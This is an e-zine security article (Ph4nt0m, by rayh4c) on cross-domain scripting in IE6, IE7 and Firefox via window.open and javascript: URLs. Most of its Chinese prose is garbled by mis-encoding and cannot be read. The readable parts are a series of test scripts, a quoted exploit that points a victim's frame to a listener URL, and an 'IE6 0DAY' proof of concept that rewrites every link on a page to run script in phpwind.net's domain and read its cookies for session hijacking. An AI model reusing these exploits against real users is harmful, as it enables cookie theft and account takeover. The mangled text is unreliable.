                          ==Ph4nt0m Security Team==
 
                       Issue 0x02, Phile #0x04 of 0x0A
 

|=---------------------------------------------------------------------------=|
|=-----------------------=[ ǳĿȫ ]=----------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[         By rayh4c        ]=----------------------=|
|=----------------------=[    <rayh4c_at_80sec.com>   ]=---------------------=|
|=---------------------------------------------------------------------------=|


    Manuel CaballeroţεBLUEHATϽһA Resident in My Domain
⣬ϵ˼פԼʼţԼBLOGдһЩص
ݣʱһֱHIȺ⣬ҶΪҳҳǳ棬
Ըÿҳ档ҳҲĿȫ˲ԡ

1.αЭĺ

    JAVASCRIPTҶƵʹwindowwindowľĴڣ
windowopen¿ĴִαЭ顣

    ڱһWEBʼʵ飺

    ø http://127.0.0.1/test.htm test.htmĽűݣ

    <script>   
    x=window.open('about:blank');
    x.location="javascript:alert(document.domain)"
    </script>

    ǣ

    IE6ִαЭ飬Ϊڵ127.0.0.1
    IE7ִαЭ飬Ϊڵ127.0.0.1
    FirefoxִαЭ,ΪûΪNULL

    FirefoxӿڿҲиBUGIPַĵFirefoxûбϳ򣬵
ʵʰ»Ǳϳ

    ΪĲַ⣬ҰﵯĹϵ£ԭĴڽиҳ
ҳʵ֤:

    ҳҳͬһҳضҳURLִַαЭ顣


2.ҳҳĹϵ

    ҳҳ󣬸ҳҳǷϵأ

    ԣø http://127.0.0.1/test2.htm test2.htmĽű
ݣ

    <script>   
    x=window.open('about:blank');
    x.location="http://www.163.com" //163վ
    setTimeout(function(){
        x.location="http://127.0.0.1";
    },5000)  //5ض127.0.0.1
    </script>

    IE6IE7Firefoxһ£ʵĽҳ163վ5Ȼ
127.0.0.1

    Ծҳڷ󣬻ǻܸҳĿơ


3.֮ǣ

    ҳҳĳִαЭʲôЧ

    ø http://127.0.0.1/test3.htmtest3.htmĽűݣ

    <script>   
    x=window.open('about:blank');
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    ǣ

    IE6ûзӦ
    IE7ܾʡ
    Firefoxalertûж塣

    ЩϢԵ˵ҳ͸ҳͬһǲҳҳ
ִαЭűġ

    Ϊ˽һ֤ҳͬһҳԣ

    ø http://127.0.0.1/test4.htmtest4.htmĽűݣ

    <script> 
    document.cookie='xss:true'  //һCOOKIEΪxss:true
    x=window.open('about:blank');
    x.location="http://127.0.0.1"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    IE6IE7Firefox˳ĵCOOKIEֵ˵ҳ͸ҳͬһ
ҳҳִαЭűġ


4.ȫϵĲ

    ҳҳ΢ĹϵͿʼȫˣPDPȴţڷҳʱ
EXP:

    javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

    EXPֵĸǣ

    ҳA򣬸ҳָҳBһܵҳ棬ҳܹBҳڿ
URLַǵ͵Ŀˡ

    ҳܹܵĹؼwindow.frames[0]ûܵƣڶ
locationָĵַǲ

    ǰչҳ˼·ڵ3ֵĻϲȥ,locationָĵַʹ
new String()

    ø http://127.0.0.1/test5.htmtest5.htmĽűݣ

    <script>   
    x=window.open('about:blank');
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location=new String("javascript:alert(document.cookie)")
    },5000)
    </script>

    IE6COOKIE
    IE7ܾʡ
    Firefoxalertûж塣

    IE6漣ĵCOOKIE˿ִнű

5.Եĺ

    ǷһIE60DAYһ̶ȫԵģ
EXP

    <a href="">IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open('http://www.phpwind.net');
        setTimeout(function(){
            x.location=new String("javascript:alert(document.cookie)")
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document.links.length;i++) { 
            document.links[i].href="javascript:win()"
        }
    }
    </script>

    ӺϵõPHPWIND̳COOKIEζźڿͨƵĹԵ
ʹվCOOKIEȻٳĻỰ

    ©൱һûƵXSS©޷ģվֻܽһļ
ǿͻ˵ĻỰȫʹSSLӡðȫCOOKIEHTTPONLYе
ˮӡȡ


6.ܽ

    ȫıڴwindowĲ©ûп
ͬм̳йϵwindowı仯ֻǶwindowһЩĲ
͵ƣƹƿִ˽ű

    ©ҲԿIE7һЩµİȫԣ̳ͨйϵwindow
ִнűαЭжģIE7ѾʼƵĹ

    ﲢûڱϽȫ⣬IE7ֻ˿ִнű
ĲȻǷеģԹҳIE7¿ԿURLFirefoxȴûдͬ
⣬˵ͬڰȫĿҲǴںܶġ

    IEֲ󷽷ֺܶ඼סˣųͬ
ڡƵ˼·ҿԼھһЩ©

    лHIȺﹲͬ۵ѡ

7.ο

[1] Browser's Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

-EOF-